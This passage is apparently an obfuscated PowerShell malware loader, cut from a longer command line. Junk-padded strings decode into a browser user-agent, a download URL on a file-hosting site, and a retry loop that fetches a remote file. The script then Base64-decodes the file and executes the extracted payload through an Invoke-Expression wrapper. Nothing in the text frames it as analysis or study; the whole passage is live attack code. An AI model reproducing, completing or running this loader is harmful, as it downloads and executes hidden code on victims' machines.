Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. 
Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. 
itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. 
EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;" |